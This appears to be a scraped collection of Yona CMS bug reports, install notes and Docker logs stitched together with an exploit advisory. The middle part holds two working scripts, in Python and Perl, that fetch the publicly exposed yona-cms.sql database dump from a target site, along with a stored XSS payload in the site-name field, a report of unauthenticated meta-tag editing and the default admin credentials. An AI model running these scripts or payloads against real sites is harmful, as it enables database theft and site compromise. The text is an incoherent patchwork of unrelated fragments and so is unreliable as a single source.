For the Meta-Description , Title and Keyword the fields are missing and cannot be updated. I have tried cloning the master source on 3 computers and still the meta tags cannot be updated. They always output as null.

I edit Page in Admin CMS and it show this error:

Fatal error: Call to a member function delete() on null in <my_path>/app/modules/Page/Model/Page.php on line 56

• It still update in database
• Its look like something wrong in function delete in Application\Cache\Manager

While testing exception handling only 200 were sent. Upon inspection found the right way to handle the headers in response so it really does send 404 or 503 to the client. Also moved "require" for vendor/autoload.php file into the loader. For consistency reasons I also updated the final output of dispatch(). (Upon testing $response->send() sends the headers so no need for explicit call of $response->sendHeaders())

Hi, I've made a simple module that extends cms with an API, implementing just page entity for now. If you like this as a base, it can be implemented for all entities. It includes simple filters which works with entities, and can display only the required data in custom format.

After installation going to http://yona-cms.local/admin results in a 404 error. Going to http://yona-cms.local/public/returns a page without any assets loaded, these assets can't be found either.

Views rendered in wrong order. You could see the result here (if link will be unavailable, see screenshot below). Phpinfo's information could be found here. It looks really weird, because the same instance on a local server works as expected.

Без авторизации в панели управления можно получить доступ к этой странице и заменить мета-теги

Еще: http://demo.yonacms.com/seo/manager http://demo.yonacms.com/cms/language

PHP message: PHP Notice: Access to undefined property Page\Model\Page::cacheManager in app/modules/Page/Model/Page.php on line 56 PHP message: PHP Fatal error: Call to a member function delete() on null in app/modules/Page/Model/Page.php on line 56"

In admin/tree categories (for example */public/tree/admin/edit/15) when you press [Save] button error will occure:

Catchable fatal error: Argument 1 passed to Phalcon\Mvc\Model::validate() must implement interface Phalcon\ValidationInterface, instance of Phalcon\Mvc\Model\Validator\Uniqueness given in C:\usr\Apache24\htdocs\yona\app\modules\Tree\Model\Category.php on line 53

Пишем в SITE NAME (остальные не проверял) и вуаля:

Yona <b>CMS</b></title><script>alert('Ай-ай-аааай!')</script><title>Еще один title!

###########################################################################

Impact :

• The product stores sensitive information in files or directories that are accessible

to actors outside of the intended control sphere.

• An information exposure is the intentional or unintentional disclosure of information

to an actor that is not explicitly authorized to have access to that information.

• phpMyAdmin is a free software tool written in PHP, intended to handle the administration of

MySQL over the World Wide Web. It can be used to dump a database or a collection of

databases for backup or transfer to another SQL server (not necessarily a MySQL server).

The dump typically contains SQL statements to create the table, populate it, or both.

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and

should not be found on a production system.

• It looks like this file contains a database backup/dump.

Acunetix inferred this filename from the domain name. A database backup contains a record of the

table structure and/or the data from a database and is usually in the form of a list of SQL statements.

A database backup is most often used for backing up a database so that its contents can be restored

in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible

to the web server. As a workaround, you could restrict access to this file.

###########################################################################

Installation

Composer Run

composer create-project oleksandr-torosh/yona-cms -s dev Or create composer.json file and install dependencies:

{
"require": {
"oleksandr-torosh/yona-cms": "dev-master"
}
} composer install After some time, do not forget run composer update for update dependencies:

composer update Composer is required. It will install required libraries. If you have error with autoload.php file, the reason - missed composer update installation step.

How to install Composer =>

getcomposer.org/doc/00-intro.md#installation-linux-unix-osx

Admin dashboard Open http://yona-cms/admin and auth:

login: yona password: yonacmsphalcon Change admin user password and delete yona user.

Database Edit /app/config/environment/development.php and setup database connection. Import MySQL dump file yona-cms.sql

Requirements php 5.6+ phalcon 3.0.0+ mysql php-intl apache (+mod_rewrite) or nginx

###########################################################################

File :

/yona-cms.sql

-- phpMyAdmin SQL Dump -- version 3.4.11.1deb2+deb7u1 -- phpmyadmin.net

-- Host: localhost -- Server version: 5.6.23 -- PHP Version: 5.6.10-1~dotdeb+7.3 -- Database: yona-cms

github.com/alexander-torosh/yona-cms/raw/master/yona-cms.sql

File :

/yona_cms_postgres.sql

-- PostgreSQL database dump -- Dumped from database version 9.4.8 -- Dumped by pg_dump version 9.4.8

raw.githubusercontent.com/alexander-torosh/yona-cms/master/yona_cms_postgres.sql

###########################################################################

Database Disclosure Information Exposure Exploit 1 :

#!/usr/bin/python import string import re from urllib2 import Request, urlopen disc = "/yona-cms.sql" url = raw_input ("URL: ") req = Request(url+disc) rta = urlopen(req) print "Result" html = rta.read() rdo = str(re.findall("resources.=", html)) print rdo exit

###########################################################################

Database Disclosure Information Exposure Exploit 2 :

#!/usr/bin/perl -w

Author : KingSkrupellos

Team : Cyberizm Digital Security Army

use LWP::Simple; use LWP::UserAgent;

system('cls'); system('YonaCMS Software Database Disclosure Exploit'); system('color a');

if(@ARGV < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } ($TargetIP, $path, $File,) = @ARGV;

$File="yona-cms.sql"; my $url = "http://" . $TargetIP . $path . $File; print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/yona-cms.sql");

if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/yona-cms.sql\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); }

➜  yona-cms git:(php7.0) docker-compose up                   
Starting yona-cms-phpmyadmin ... 
Starting yona-cms-mysql ... done
Starting yona-cms-php7 ... done
Starting yona-cms-www ... done
Attaching to yona-cms-phpmyadmin, yona-cms-mysql, yona-cms-php7, yona-cms-www
yona-cms-phpmyadmin | 2018-04-18 22:47:29,962 CRIT Supervisor running as root (no user in config file)
yona-cms-phpmyadmin | 2018-04-18 22:47:29,963 WARN Included extra file "/etc/supervisor.d/nginx.ini" during parsing
yona-cms-phpmyadmin | 2018-04-18 22:47:29,966 WARN Included extra file "/etc/supervisor.d/php.ini" during parsing
yona-cms-phpmyadmin | 2018-04-18 22:47:29,985 INFO RPC interface 'supervisor' initialized
yona-cms-phpmyadmin | 2018-04-18 22:47:29,991 CRIT Server 'unix_http_server' running without any HTTP authentication checking
yona-cms-mysql | Initializing database
yona-cms-mysql | mkdir: cannot create directory '/var/lib/mysql//mysql': Permission denied
yona-cms-mysql | Fatal error Can't create database directory '/var/lib/mysql//mysql'
yona-cms-mysql | 
yona-cms-mysql | The latest information about mysql_install_db is available at
yona-cms-mysql | https://mariadb.com/kb/en/installing-system-tables-mysql_install_db
yona-cms-mysql exited with code 1
yona-cms-phpmyadmin | 2018-04-18 22:47:29,994 INFO supervisord started with pid 1
yona-cms-phpmyadmin | 2018-04-18 22:47:30,997 INFO spawned: 'php-fpm' with pid 13
yona-cms-php7 | [18-Apr-2018 22:47:31] ERROR: Unable to create the PID file (/run/php/php7.1-fpm.pid).: No such file or directory (2)
yona-cms-php7 | [18-Apr-2018 22:47:31] ERROR: FPM initialization failed
yona-cms-php7 exited with code 78
yona-cms-phpmyadmin | 2018-04-18 22:47:30,999 INFO spawned: 'nginx' with pid 14
^CGracefully stopping... (press Ctrl+C again to force)
Stopping yona-cms-www        ... done
Stopping yona-cms-phpmyadmin ... done

Firstly, I use PostgresQL 9.6 and your file seem older. Can you backup a new version please , because each time i try to excute SQL query , it has error at line 755 (Copy new record to admin_user table)

Secondly, I have tried with MySQL also but i can not move or add new node. I just can rename node only.

Can you help me with this

I've made Little fix on Page.php

public function validation()
    {
     //add Validation init
      $validator = new Validation();

      $validator->add('slug', new UniquenessValidator(
          [
              "model"   => $this,
              "message" => $this->getDi()->get('helper')->translate("Page with slug is already exists")
          ]
      ));
      return $this->validate($validator);
    }